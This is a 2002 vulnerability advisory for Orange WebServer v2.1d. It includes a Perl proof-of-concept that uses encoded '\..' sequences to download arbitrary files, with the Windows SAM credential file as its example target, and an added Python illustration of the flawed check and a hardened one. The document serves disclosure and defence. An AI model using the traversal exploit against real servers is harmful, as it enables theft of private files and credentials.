Orange WebServer v2.1d Unicode Directory Traversal Vulnerability

Type

File Disclosure

Release Date

October 6, 2002

Product / Vendor

Orange Web Server can turn any PC into a web server.

Orange Web Server has the following features:

- Highly optimized - very fast and very small memory footprint
- Easy to install and configure
- Dynamic IP publishing
- Simple administration
- Server-side scripting using a subset of the JScript language
- Standard CGI implementation
- Runs on Windows 95/98/NT/2000

Summary

Due to a vulnerability in Orange WebServer v2.1d, it is possible to bypass the URL security check and manipulate files on the remote host. In this attack we exploit the vulnerability and then use it to download any file from a remote machine. This would potentially enable a malicious user who visited the web site to obtain private files and information from the machine.

This is the version in which Matt Moore's directory traversal vulnerability was corrected: http://online.securityfocus.com/bid/5197/

Exploit

The exploit works by constructing a URL that causes Orange WebServer to navigate to any desired folder on the same logical drive and access the files in it. This is achieved by using the Unicode character representations of "/" and "\", which lets a user traverse the server to any directory on the same logical drive as the web application. In addition, unauthenticated users can perform the following GET request in these directories.

==================== SNIP ====================

#!/usr/bin/perl -w
# Proof of concept: requests <file> from <directory> on the same logical
# drive as the web root by prefixing the path with URL-encoded "\.." steps.

die "\nOrange WebServer v2.1d Unicode Directory Traversal Vulnerability / SecurityOffice\n\nUsage: $0 <host> <directory> <file> / Example: $0 www.target.com /winnt/repair/ sam\n\n" if $#ARGV < 2;

get($ARGV[0], $ARGV[1], $ARGV[2]);

exit 0;

sub get {
    my ($host, $directory, $file) = @_;

    # %5c is "\" and %2e is "."; the request is handed to lynx as-is.
    system "lynx $host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c$directory%5c$file";

    print "File $file Download Completed!\n\n";
}

==================== SNIP ====================
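
The class of flaw described above, shown from the defender's side as an added example (not part of the original advisory and not Orange WebServer's code): a filter that inspects the raw URL before decoding accepts the encoded request, while decoding once, canonicalising, and enforcing containment in the document root rejects it. DOCROOT, the function names, the form of the weak check and the sample requests are assumptions constructed for the illustration.

```python
import ntpath  # Windows path rules, usable on any platform
from urllib.parse import unquote

DOCROOT = r"C:\orange\htdocs"  # hypothetical document root (assumption)


def naive_is_safe(raw_path):
    """Weak check (hypothetical): looks for literal traversal sequences in
    the still-encoded URL, so %2e%2e and %5c pass straight through."""
    return "../" not in raw_path and "..\\" not in raw_path


def resolve_request(raw_path, docroot=DOCROOT):
    """Hardened check: decode once, canonicalise, then enforce containment.

    Returns the absolute path to serve, or None if the request is rejected.
    """
    decoded = unquote(raw_path)  # decode before any security decision
    if "\x00" in decoded or ":" in decoded:
        return None  # NUL bytes, drive letters, NTFS alternate streams
    # Treat "/" and "\" alike and never let the request supply a root.
    relative = decoded.replace("/", "\\").lstrip("\\")
    root = ntpath.normpath(docroot)
    candidate = ntpath.normpath(ntpath.join(root, relative))
    # Compare canonical forms case-insensitively, as Windows does.
    c, r = ntpath.normcase(candidate), ntpath.normcase(root)
    if c == r or c.startswith(r + "\\"):
        return candidate
    return None


# Constructed sample requests: one benign, one in the advisory's format.
SAMPLES = [
    "/index.html",
    "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c/winnt/repair/%5csam",
]


def audit(paths=SAMPLES):
    """Return (path, naive verdict, hardened result) for each request."""
    return [(p, naive_is_safe(p), resolve_request(p)) for p in paths]


if __name__ == "__main__":
    for path, naive, hardened in audit():
        print(f"{path}\n  naive check passes: {naive}\n  hardened result: {hardened}")
```
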

Tested

Orange WebServer v2.1d / Windows 2000 sp3

Vulnerable

Orange WebServer v2.1d

Disclaimer

http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory.

Author

Tamer Sahin
ts(at)securityoffice.net
http://www.securityoffice.net